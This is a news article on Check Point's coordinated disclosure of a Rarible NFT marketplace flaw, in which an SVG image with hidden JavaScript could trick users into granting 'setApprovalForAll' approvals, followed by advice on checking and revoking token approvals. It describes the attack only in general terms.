A security flaw in the Rarible NFT (non-fungible token) market allowed threat actors to use a relatively simple trick to steal digital assets and transfer them directly to their wallets.
Rarible is a community-focused NFT marketplace that offers up to 50% royalties, has 2.1 million registered users, hundreds of millions of US dollars in annual trade volumes, and support for three blockchains.
The dangerous market failure was discovered by analysts at check Pointwho worked with Rarible to implement a solution.
However, users who have already been victimized should verify and revoke token approvals they granted through previous fraudulent transaction requests.
Hide code inside NFT
The issue stems from the risk inherent in the "setApprovalForAll" function that is part of the EIP-721 NFT standard, which gives complete control of NFT assets to someone else.
(Check Point)
By falsifying an apparently innocuous transaction request and asking the asset holder to sign it, phishing actors steal their target's NFTs or even take over the wallet without alerting the victim.
The security flaw in Rarible is that the platform allowed users to upload media files of up to 100 MB without checking them for potentially malicious content.
Based on that, Check Point researchers figured they could create an SVG image hiding a malicious JavaScript payload and upload it to Rarible as an NFT for sale.
Clicking on the NFT image or IPFS link would trigger code execution which results in the target receiving a "setApprovalForAll" transaction request in their browser.
Assuming the victim is careless or misunderstands what the transaction is about, they can approve the request, giving the attacker access to their entire collection.
From there, hackers can use the "transferFrom" action and simply steal the NFTs, transferring them to a wallet they own. As in all blockchain transactions, this action is not reversible.
Check Point's report mentions a case of real-world abuse against Taiwanese celebrity Jay Chou, who recently lost a "Bored Ape" NFT worth $500,000 to a transaction signature scammer.
How to protect your assets
It is important to underline that Rarible is not the only market with this specific defect, as Check Point discovered a very similar problem in OpenSea last year.
Essentially, the problem lies with the NFT transaction standard and the ambiguity of signature requests that make it difficult for asset holders to assess their authenticity and real scope.
For this reason, any time you receive a request to sign something, examine it carefully to determine what it is. If in doubt, do not authorize the transaction.
Users are advised to use this token approval checker review your previous approvals and revoke any that appear fraudulent.
Due to the way these attacks work, there is often a delay between access approvals and asset transfers, so there may still be time for some victims.
As pioneering as blockchain technology may be, the aspect of protecting user assets is still lagging behind, so investors need to be very cautious about everything.
